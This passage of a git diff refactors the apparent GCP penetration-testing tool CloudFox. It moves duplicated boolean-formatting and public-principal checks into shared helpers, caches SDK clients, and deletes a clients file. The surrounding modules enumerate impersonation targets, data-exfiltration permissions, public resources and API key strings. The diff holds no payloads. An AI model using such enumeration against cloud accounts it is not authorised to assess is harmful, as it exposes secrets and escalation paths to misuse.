*MemorystoreModule) instancesToTableBody(instances []memorystoreservice. fmt.Sprintf("%d", instance.MemorySizeGB), instance.RedisVersion, fmt.Sprintf("%s:%d", instance.Host, instance.Port), - boolToYesNo(instance.AuthEnabled), + shared.BoolToYesNo(instance.AuthEnabled), transitEncryption, instance.State, extractNetworkName(instance.AuthorizedNetwork), diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go index bcbd8f44..3b99776c 100644 --- a/gcp/commands/monitoringalerts.go +++ b/gcp/commands/monitoringalerts.go @@ -7,6 +7,7 @@ import ( "strings" "sync" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -618,7 +619,7 @@ func (m *MonitoringAlertsModule) policiesToTableBody(policies []AlertPolicy, cha m.GetProjectName(p.ProjectID), p.ProjectID, p.DisplayName, - boolToYesNo(p.Enabled), + shared.BoolToYesNo(p.Enabled), cond.DisplayName, metricType, comparison, @@ -632,7 +633,7 @@ func (m *MonitoringAlertsModule) policiesToTableBody(policies []AlertPolicy, cha m.GetProjectName(p.ProjectID), p.ProjectID, p.DisplayName, - boolToYesNo(p.Enabled), + shared.BoolToYesNo(p.Enabled), "-", "-", "-", @@ -654,8 +655,8 @@ func (m *MonitoringAlertsModule) channelsToTableBody(channels []NotificationChan c.ProjectID, c.DisplayName, c.Type, - boolToYesNo(c.Enabled), - boolToYesNo(c.Verified), + shared.BoolToYesNo(c.Enabled), + shared.BoolToYesNo(c.Verified), destination, }) } @@ -682,14 +683,14 @@ func (m *MonitoringAlertsModule) uptimeToTableBody(checks []UptimeCheck) [][]str m.GetProjectName(u.ProjectID), u.ProjectID, u.DisplayName, - boolToYesNo(u.Enabled), + shared.BoolToYesNo(u.Enabled), host, u.Protocol, fmt.Sprintf("%d", u.Port), path, u.Period, timeout, - boolToYesNo(u.SSLEnabled), + shared.BoolToYesNo(u.SSLEnabled), }) } return body diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go index 7e873824..d9e16515 100644 --- a/gcp/commands/networktopology.go +++ b/gcp/commands/networktopology.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "sort" @@ -1452,8 +1453,8 @@ func (m *NetworkTopologyModule) subnetsToTableBody(subnets []Subnet) [][]string m.extractNetworkName(s.Network), s.Region, s.IPCIDRRange, - boolToYesNo(s.PrivateIPGoogleAccess), - boolToYesNo(s.FlowLogsEnabled), + shared.BoolToYesNo(s.PrivateIPGoogleAccess), + shared.BoolToYesNo(s.FlowLogsEnabled), purpose, binding.Role, binding.Member, @@ -1468,8 +1469,8 @@ func (m *NetworkTopologyModule) subnetsToTableBody(subnets []Subnet) [][]string m.extractNetworkName(s.Network), s.Region, s.IPCIDRRange, - boolToYesNo(s.PrivateIPGoogleAccess), - boolToYesNo(s.FlowLogsEnabled), + shared.BoolToYesNo(s.PrivateIPGoogleAccess), + shared.BoolToYesNo(s.FlowLogsEnabled), purpose, "-", "-", @@ -1490,8 +1491,8 @@ func (m *NetworkTopologyModule) peeringsToTableBody(peerings []VPCPeering) [][]s m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, p.State, - boolToYesNo(p.ImportCustomRoute), - boolToYesNo(p.ExportCustomRoute), + shared.BoolToYesNo(p.ImportCustomRoute), + shared.BoolToYesNo(p.ExportCustomRoute), }) } return body @@ -1512,7 +1513,7 @@ func (m *NetworkTopologyModule) natsToTableBody(nats []CloudNATConfig) [][]strin nat.Region, m.extractNetworkName(nat.Network), natIPs, - boolToYesNo(nat.EnableLogging), + shared.BoolToYesNo(nat.EnableLogging), }) } return body diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go index 1d01dd78..8bf6d46a 100644 --- a/gcp/commands/notebooks.go +++ b/gcp/commands/notebooks.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" @@ -155,7 +156,7 @@ func (m *NotebooksModule) addToLoot(projectID string, instance notebooksservice. "# Public IP: %s, Proxy Access: %s\n", instance.Name, instance.ProjectID, instance.Location, instance.State, instance.ServiceAccount, - boolToYesNo(!instance.NoPublicIP), boolToYesNo(!instance.NoProxyAccess), + shared.BoolToYesNo(!instance.NoPublicIP), shared.BoolToYesNo(!instance.NoProxyAccess), ) if instance.ProxyUri != "" { @@ -272,8 +273,8 @@ func (m *NotebooksModule) instancesToTableBody(instances []notebooksservice.Note attackPaths, network, subnet, - boolToYesNo(!instance.NoPublicIP), - boolToYesNo(!instance.NoProxyAccess), + shared.BoolToYesNo(!instance.NoPublicIP), + shared.BoolToYesNo(!instance.NoProxyAccess), proxyUri, gpu, creator, diff --git a/gcp/commands/orgpolicies.go b/gcp/commands/orgpolicies.go index 1cc9a080..5fc0e8b6 100644 --- a/gcp/commands/orgpolicies.go +++ b/gcp/commands/orgpolicies.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" @@ -144,10 +145,10 @@ func (m *OrgPoliciesModule) addPolicyToLoot(projectID string, policy orgpolicyse lootFile.Contents += fmt.Sprintf( "# Enforced: %s, AllowAll: %s, DenyAll: %s, Inherit: %s\n", - boolToYesNo(policy.Enforced), - boolToYesNo(policy.AllowAll), - boolToYesNo(policy.DenyAll), - boolToYesNo(policy.InheritParent), + shared.BoolToYesNo(policy.Enforced), + shared.BoolToYesNo(policy.AllowAll), + shared.BoolToYesNo(policy.DenyAll), + shared.BoolToYesNo(policy.InheritParent), ) if len(policy.AllowedValues) > 0 { @@ -213,10 +214,10 @@ func (m *OrgPoliciesModule) policiesToTableBody(policies []orgpolicyservice.OrgP policy.ProjectID, policy.Constraint, description, - boolToYesNo(policy.Enforced), - boolToYesNo(policy.AllowAll), - boolToYesNo(policy.DenyAll), - boolToYesNo(policy.InheritParent), + shared.BoolToYesNo(policy.Enforced), + shared.BoolToYesNo(policy.AllowAll), + shared.BoolToYesNo(policy.DenyAll), + shared.BoolToYesNo(policy.InheritParent), allowedValues, deniedValues, }) diff --git a/gcp/commands/publicaccess.go b/gcp/commands/publicaccess.go index 63a04168..c3b3ed6c 100644 --- a/gcp/commands/publicaccess.go +++ b/gcp/commands/publicaccess.go @@ -10,6 +10,7 @@ import ( kmsservice "github.com/BishopFox/cloudfox/gcp/services/kmsService" pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -306,7 +307,7 @@ func (m *PublicAccessModule) checkStorageBuckets(ctx context.Context, projectID for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { resource := PublicResource{ ResourceType: "Cloud Storage", ResourceName: bucket.Name, @@ -340,7 +341,7 @@ func (m *PublicAccessModule) checkComputeSnapshots(ctx context.Context, projectI for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { resource := PublicResource{ ResourceType: "Compute Snapshot", ResourceName: snapshot.Name, @@ -381,7 +382,7 @@ func (m *PublicAccessModule) checkComputeImages(ctx context.Context, projectID s for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { resource := PublicResource{ ResourceType: "Compute Image", ResourceName: image.Name, @@ -476,7 +477,7 @@ func (m *PublicAccessModule) checkCloudRunServices(ctx context.Context, projectI for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { serviceName := publicAccessExtractResourceName(svc.Name) location := publicAccessExtractLocation(svc.Name) res := PublicResource{ @@ -521,7 +522,7 @@ func (m *PublicAccessModule) checkCloudFunctions(ctx context.Context, projectID for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { funcName := publicAccessExtractResourceName(fn.Name) location := publicAccessExtractLocation(fn.Name) @@ -566,7 +567,7 @@ func (m *PublicAccessModule) checkPubSubTopics(ctx context.Context, projectID st for _, topic := range topics { for _, binding := range topic.IAMBindings { - if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(binding.Member) { resource := PublicResource{ ResourceType: "Pub/Sub Topic", ResourceName: topic.Name, @@ -591,7 +592,7 @@ func (m *PublicAccessModule) checkPubSubSubscriptions(ctx context.Context, proje for _, sub := range subs { for _, binding := range sub.IAMBindings { - if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(binding.Member) { resource := PublicResource{ ResourceType: "Pub/Sub Subscription", ResourceName: sub.Name, @@ -625,7 +626,7 @@ func (m *PublicAccessModule) checkSecretManagerSecrets(ctx context.Context, proj for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { secretName := publicAccessExtractResourceName(secret.Name) resource := PublicResource{ ResourceType: "Secret Manager", @@ -668,7 +669,7 @@ func (m *PublicAccessModule) checkArtifactRegistry(ctx context.Context, projectI for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { repoName := publicAccessExtractResourceName(repo.Name) location := publicAccessExtractLocation(repo.Name) resource := PublicResource{ @@ -706,7 +707,7 @@ func (m *PublicAccessModule) checkKMSKeys(ctx context.Context, projectID string, for _, key := range keys { for _, binding := range key.IAMBindings { - if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(binding.Member) { resource := PublicResource{ ResourceType: "Cloud KMS", ResourceName: key.Name, @@ -735,7 +736,7 @@ func (m *PublicAccessModule) checkSpanner(ctx context.Context, projectID string, // Check instances for _, instance := range result.Instances { for _, binding := range instance.IAMBindings { - if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(binding.Member) { resource := PublicResource{ ResourceType: "Spanner Instance", ResourceName: instance.Name, @@ -752,7 +753,7 @@ func (m *PublicAccessModule) checkSpanner(ctx context.Context, projectID string, // Check databases for _, db := range result.Databases { for _, binding := range db.IAMBindings { - if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(binding.Member) { resource := PublicResource{ ResourceType: "Spanner Database", ResourceName: db.Name, @@ -847,7 +848,7 @@ func (m *PublicAccessModule) checkDataprocClusters(ctx context.Context, projectI for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { resource := PublicResource{ ResourceType: "Dataproc Cluster", ResourceName: cluster.ClusterName, @@ -890,7 +891,7 @@ func (m *PublicAccessModule) checkNotebooks(ctx context.Context, projectID strin for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { location := publicAccessExtractLocation(instance.Name) resource := PublicResource{ ResourceType: "Notebook Instance", @@ -934,7 +935,7 @@ func (m *PublicAccessModule) checkSourceRepos(ctx context.Context, projectID str for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { resource := PublicResource{ ResourceType: "Source Repository", ResourceName: publicAccessExtractResourceName(repo.Name), diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go index a561798f..35698791 100644 --- a/gcp/commands/pubsub.go +++ b/gcp/commands/pubsub.go @@ -7,6 +7,7 @@ import ( "sync" PubSubService "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -105,7 +106,7 @@ func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { pushSubs := 0 for _, topic := range allTopics { for _, binding := range topic.IAMBindings { - if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(binding.Member) { publicTopics++ break } @@ -113,7 +114,7 @@ func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { } for _, sub := range allSubs { for _, binding := range sub.IAMBindings { - if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(binding.Member) { publicSubs++ break } diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index 3e4ba6a1..5dcae7f0 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -8,6 +8,7 @@ import ( secretmanager "cloud.google.com/go/secretmanager/apiv1" SecretsService "github.com/BishopFox/cloudfox/gcp/services/secretsService" + "github.com/BishopFox/cloudfox/gcp/shared" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" @@ -258,34 +259,6 @@ func getSecretShortName(fullName string) string { return fullName } -// getSecretMemberType extracts the member type from a GCP IAM member string -func getSecretMemberType(member string) string { - switch { - case member == "allUsers": - return "PUBLIC" - case member == "allAuthenticatedUsers": - return "ALL_AUTHENTICATED" - case strings.HasPrefix(member, "user:"): - return "User" - case strings.HasPrefix(member, "serviceAccount:"): - return "ServiceAccount" - case strings.HasPrefix(member, "group:"): - return "Group" - case strings.HasPrefix(member, "domain:"): - return "Domain" - case strings.HasPrefix(member, "projectOwner:"): - return "ProjectOwner" - case strings.HasPrefix(member, "projectEditor:"): - return "ProjectEditor" - case strings.HasPrefix(member, "projectViewer:"): - return "ProjectViewer" - case strings.HasPrefix(member, "deleted:"): - return "Deleted" - default: - return "Unknown" - } -} - // ------------------------------ // Output Generation // ------------------------------ @@ -465,7 +438,7 @@ func (m *SecretsModule) secretsToTableBody(secrets []SecretsService.SecretInfo) if len(secret.IAMBindings) > 0 { for _, binding := range secret.IAMBindings { for _, member := range binding.Members { - memberType := getSecretMemberType(member) + memberType := shared.GetPrincipalType(member) body = append(body, []string{ m.GetProjectName(secret.ProjectID), secret.ProjectID, diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index f11f1783..56849cb5 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -9,6 +9,7 @@ import ( attackpathservice "github.com/BishopFox/cloudfox/gcp/services/attackpathService" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" OAuthService "github.com/BishopFox/cloudfox/gcp/services/oauthService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -675,21 +676,21 @@ func (m *WhoAmIModule) findImpersonationTargets(ctx context.Context, logger inte canActAs := false for _, tc := range impersonationInfo.TokenCreators { - if tc == fullMember || tc == m.Identity.Email || tc == "allUsers" || tc == "allAuthenticatedUsers" { + if tc == fullMember || tc == m.Identity.Email || shared.IsPublicPrincipal(tc) { canImpersonate = true break } } for _, kc := range impersonationInfo.KeyCreators { - if kc == fullMember || kc == m.Identity.Email || kc == "allUsers" || kc == "allAuthenticatedUsers" { + if kc == fullMember || kc == m.Identity.Email || shared.IsPublicPrincipal(kc) { canCreateKeys = true break } } for _, aa := range impersonationInfo.ActAsUsers { - if aa == fullMember || aa == m.Identity.Email || aa == "allUsers" || aa == "allAuthenticatedUsers" { + if aa == fullMember || aa == m.Identity.Email || shared.IsPublicPrincipal(aa) { canActAs = true break } @@ -1544,9 +1545,9 @@ func (m *WhoAmIModule) buildTables() []internal.TableFile { impersonationBody = append(impersonationBody, []string{ target.ServiceAccount, target.ProjectID, - whoamiBoolToYesNo(target.CanImpersonate), - whoamiBoolToYesNo(target.CanCreateKeys), - whoamiBoolToYesNo(target.CanActAs), + shared.BoolToYesNo(target.CanImpersonate), + shared.BoolToYesNo(target.CanCreateKeys), + shared.BoolToYesNo(target.CanActAs), }) } @@ -1697,10 +1698,3 @@ func (m *WhoAmIModule) writeFlatOutput(ctx context.Context, logger internal.Logg } } -// whoamiBoolToYesNo converts a boolean to "Yes" or "No" -func whoamiBoolToYesNo(b bool) string { - if b { - return "Yes" - } - return "No" -} diff --git a/gcp/sdk/clients.go b/gcp/sdk/clients.go deleted file mode 100644 index 2137ebb5..00000000 --- a/gcp/sdk/clients.go +++ /dev/null @@ -1,185 +0,0 @@ -package sdk - -import ( - "context" - "fmt" - - "cloud.google.com/go/storage" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - artifactregistry "google.golang.org/api/artifactregistry/v1" - bigquery "google.golang.org/api/bigquery/v2" - cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" - compute "google.golang.org/api/compute/v1" - container "google.golang.org/api/container/v1" - iam "google.golang.org/api/iam/v1" - run "google.golang.org/api/run/v1" - secretmanager "google.golang.org/api/secretmanager/v1" -) - -// GetStorageClient returns a Cloud Storage client -func GetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { - client, err := storage.NewClient(ctx, session.GetClientOption()) - if err != nil { - return nil, fmt.Errorf("failed to create storage client: %w", err) - } - return client, nil -} - -// GetComputeService returns a Compute Engine service -func GetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { - service, err := compute.NewService(ctx, session.GetClientOption()) - if err != nil { - return nil, fmt.Errorf("failed to create compute service: %w", err) - } - return service, nil -} - -// GetIAMService returns an IAM Admin service -func GetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { - service, err := iam.NewService(ctx, session.GetClientOption()) - if err != nil { - return nil, fmt.Errorf("failed to create IAM service: %w", err) - } - return service, nil -} - -// GetResourceManagerService returns a Cloud Resource Manager service -func GetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { - service, err := cloudresourcemanager.NewService(ctx, session.GetClientOption()) - if err != nil { - return nil, fmt.Errorf("failed to create resource manager service: %w", err) - } - return service, nil -} - -// GetSecretManagerService returns a Secret Manager service -func GetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanager.Service, error) { - service, err := secretmanager.NewService(ctx, session.GetClientOption()) - if err != nil { - return nil, fmt.Errorf("failed to create secret manager service: %w", err) - } - return service, nil -} - -// GetBigQueryService returns a BigQuery service -func GetBigQueryService(ctx context.Context, session *gcpinternal.SafeSession) (*bigquery.Service, error) { - service, err := bigquery.NewService(ctx, session.GetClientOption()) - if err != nil { - return nil, fmt.Errorf("failed to create BigQuery service: %w", err) - } - return service, nil -} - -// GetArtifactRegistryService returns an Artifact Registry service -func GetArtifactRegistryService(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistry.Service, error) { - service, err := artifactregistry.NewService(ctx, session.GetClientOption()) - if err != nil { - return nil, fmt.Errorf("failed to create Artifact Registry service: %w", err) - } - return service, nil -} - -// GetContainerService returns a GKE Container service -func GetContainerService(ctx context.Context, session *gcpinternal.SafeSession) (*container.Service, error) { - service, err := container.NewService(ctx, session.GetClientOption()) - if err != nil { - return nil, fmt.Errorf("failed to create container service: %w", err) - } - return service, nil -} - -// GetCloudRunService returns a Cloud Run service -func GetCloudRunService(ctx context.Context, session *gcpinternal.SafeSession) (*run.APIService, error) { - service, err := run.NewService(ctx, session.GetClientOption()) - if err != nil { - return nil, fmt.Errorf("failed to create Cloud Run service: %w", err) - } - return service, nil -} - -// ------------------------- CACHED CLIENT WRAPPERS ------------------------- - -// CachedGetStorageClient returns a cached Storage client -func CachedGetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { - cacheKey := CacheKey("client", "storage") - - if cached, found := GCPSDKCache.Get(cacheKey); found { - return cached.(*storage.Client), nil - } - - client, err := GetStorageClient(ctx, session) - if err != nil { - return nil, err - } - - GCPSDKCache.Set(cacheKey, client, 0) - return client, nil -} - -// CachedGetComputeService returns a cached Compute Engine service -func CachedGetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { - cacheKey := CacheKey("client", "compute") - - if cached, found := GCPSDKCache.Get(cacheKey); found { - return cached.(*compute.Service), nil - } - - service, err := GetComputeService(ctx, session) - if err != nil { - return nil, err - } - - GCPSDKCache.Set(cacheKey, service, 0) - return service, nil -} - -// CachedGetIAMService returns a cached IAM service -func CachedGetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { - cacheKey := CacheKey("client", "iam") - - if cached, found := GCPSDKCache.Get(cacheKey); found { - return cached.(*iam.Service), nil - } - - service, err := GetIAMService(ctx, session) - if err != nil { - return nil, err - } - - GCPSDKCache.Set(cacheKey, service, 0) - return service, nil -} - -// CachedGetResourceManagerService returns a cached Resource Manager service -func CachedGetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { - cacheKey := CacheKey("client", "resourcemanager") - - if cached, found := GCPSDKCache.Get(cacheKey); found { - return cached.(*cloudresourcemanager.Service), nil - } - - service, err := GetResourceManagerService(ctx, session) - if err != nil { - return nil, err - } - - GCPSDKCache.Set(cacheKey, service, 0) - return service, nil -} - -// CachedGetSecretManagerService returns a cached Secret Manager service -func CachedGetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanager.Service, error) { - cacheKey := CacheKey("client", "secretmanager") - - if cached, found := GCPSDKCache.Get(cacheKey); found { - return cached.(*secretmanager.Service), nil - } - - service, err := GetSecretManagerService(ctx, session) - if err != nil { - return nil, err - } - - GCPSDKCache.Set(cacheKey, service, 0) - return service, nil -} diff --git a/gcp/services/accessPolicyService/accessPolicyService.go b/gcp/services/accessPolicyService/accessPolicyService.go index 94679471..68e56511 100644 --- a/gcp/services/accessPolicyService/accessPolicyService.go +++ b/gcp/services/accessPolicyService/accessPolicyService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" ) @@ -21,6 +22,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *AccessPolicyService { return &AccessPolicyService{session: session} } +// getService returns an Access Context Manager service using cached session if available +func (s *AccessPolicyService) getService(ctx context.Context) (*accesscontextmanager.Service, error) { + if s.session != nil { + return sdk.CachedGetAccessContextManagerService(ctx, s.session) + } + return accesscontextmanager.NewService(ctx) +} + // AccessLevelInfo represents an access level (conditional access policy) type AccessLevelInfo struct { Name string `json:"name"` @@ -70,14 +79,8 @@ type GCIPSettingsInfo struct { // ListAccessLevels retrieves all access levels for an organization's policy func (s *AccessPolicyService) ListAccessLevels(orgID string) ([]AccessLevelInfo, error) { ctx := context.Background() - var service *accesscontextmanager.Service - var err error - if s.session != nil { - service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = accesscontextmanager.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } @@ -114,14 +117,8 @@ func (s *AccessPolicyService) ListAccessLevels(orgID string) ([]AccessLevelInfo, // ListAccessLevelsForPolicy retrieves access levels for a specific policy func (s *AccessPolicyService) ListAccessLevelsForPolicy(policyName string) ([]AccessLevelInfo, error) { ctx := context.Background() - var service *accesscontextmanager.Service - var err error - if s.session != nil { - service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = accesscontextmanager.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } diff --git a/gcp/services/apikeysService/apikeysService.go b/gcp/services/apikeysService/apikeysService.go index bd1c4550..64e23e8c 100644 --- a/gcp/services/apikeysService/apikeysService.go +++ b/gcp/services/apikeysService/apikeysService.go @@ -9,8 +9,8 @@ import ( "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" apikeys "google.golang.org/api/apikeys/v2" - "google.golang.org/api/option" ) var logger internal.Logger @@ -29,12 +29,12 @@ func NewWithSession(session *gcpinternal.SafeSession) *APIKeysService { return &APIKeysService{session: session} } -// getClientOption returns the appropriate client option based on session -func (s *APIKeysService) getClientOption() option.ClientOption { +// getService returns an API Keys service client using cached session if available +func (s *APIKeysService) getService(ctx context.Context) (*apikeys.Service, error) { if s.session != nil { - return s.session.GetClientOption() + return sdk.CachedGetAPIKeysService(ctx, s.session) } - return nil + return apikeys.NewService(ctx) } // APIKeyInfo represents information about an API key @@ -67,14 +67,8 @@ type APIKeyInfo struct { // ListAPIKeys retrieves all API keys in a project func (s *APIKeysService) ListAPIKeys(projectID string) ([]APIKeyInfo, error) { ctx := context.Background() - var service *apikeys.Service - var err error - if s.session != nil { - service, err = apikeys.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = apikeys.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") } @@ -100,14 +94,8 @@ func (s *APIKeysService) ListAPIKeys(projectID string) ([]APIKeyInfo, error) { // GetAPIKey retrieves a single API key with its key string func (s *APIKeysService) GetAPIKey(keyName string) (*APIKeyInfo, error) { ctx := context.Background() - var service *apikeys.Service - var err error - if s.session != nil { - service, err = apikeys.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = apikeys.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") } @@ -132,14 +120,8 @@ func (s *APIKeysService) GetAPIKey(keyName string) (*APIKeyInfo, error) { // GetKeyString retrieves the key string value for an API key func (s *APIKeysService) GetKeyString(keyName string) (string, error) { ctx := context.Background() - var service *apikeys.Service - var err error - if s.session != nil { - service, err = apikeys.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = apikeys.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return "", gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") } diff --git a/gcp/services/attackpathService/attackpathService.go b/gcp/services/attackpathService/attackpathService.go index b24fed40..cb73d958 100644 --- a/gcp/services/attackpathService/attackpathService.go +++ b/gcp/services/attackpathService/attackpathService.go @@ -11,6 +11,7 @@ import ( "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" crmv1 "google.golang.org/api/cloudresourcemanager/v1" "google.golang.org/api/iam/v1" "google.golang.org/api/iterator" @@ -36,6 +37,46 @@ func NewWithSession(session *gcpinternal.SafeSession) *AttackPathService { return &AttackPathService{session: session} } +// getIAMService returns an IAM service using cached session if available +func (s *AttackPathService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + +// getResourceManagerService returns a Resource Manager service using cached session if available +func (s *AttackPathService) getResourceManagerService(ctx context.Context) (*crmv1.Service, error) { + if s.session != nil { + return sdk.CachedGetResourceManagerService(ctx, s.session) + } + return crmv1.NewService(ctx) +} + +// getStorageService returns a Storage service using cached session if available +func (s *AttackPathService) getStorageService(ctx context.Context) (*storage.Service, error) { + if s.session != nil { + return sdk.CachedGetStorageService(ctx, s.session) + } + return storage.NewService(ctx) +} + +// getBigQueryService returns a BigQuery service using cached session if available +func (s *AttackPathService) getBigQueryService(ctx context.Context) (*bigquery.Service, error) { + if s.session != nil { + return sdk.CachedGetBigQueryService(ctx, s.session) + } + return bigquery.NewService(ctx) +} + +// getComputeService returns a Compute service using cached session if available +func (s *AttackPathService) getComputeService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + // DataExfilPermission represents a permission that enables data exfiltration type DataExfilPermission struct { Permission string `json:"permission"` @@ -305,12 +346,7 @@ func (s *AttackPathService) AnalyzeOrganizationAttackPaths(ctx context.Context, defer orgsClient.Close() // Get IAM service for role resolution - var iamService *iam.Service - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } + iamService, err := s.getIAMService(ctx) if err != nil { iamService = nil } @@ -378,12 +414,7 @@ func (s *AttackPathService) AnalyzeFolderAttackPaths(ctx context.Context, pathTy defer foldersClient.Close() // Get IAM service for role resolution - var iamService *iam.Service - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } + iamService, err := s.getIAMService(ctx) if err != nil { iamService = nil } @@ -436,13 +467,7 @@ func (s *AttackPathService) AnalyzeProjectAttackPaths(ctx context.Context, proje var paths []AttackPath // Get project IAM policy - var crmService *crmv1.Service - var err error - if s.session != nil { - crmService, err = crmv1.NewService(ctx, s.session.GetClientOption()) - } else { - crmService, err = crmv1.NewService(ctx) - } + crmService, err := s.getResourceManagerService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } @@ -453,12 +478,7 @@ func (s *AttackPathService) AnalyzeProjectAttackPaths(ctx context.Context, proje } // 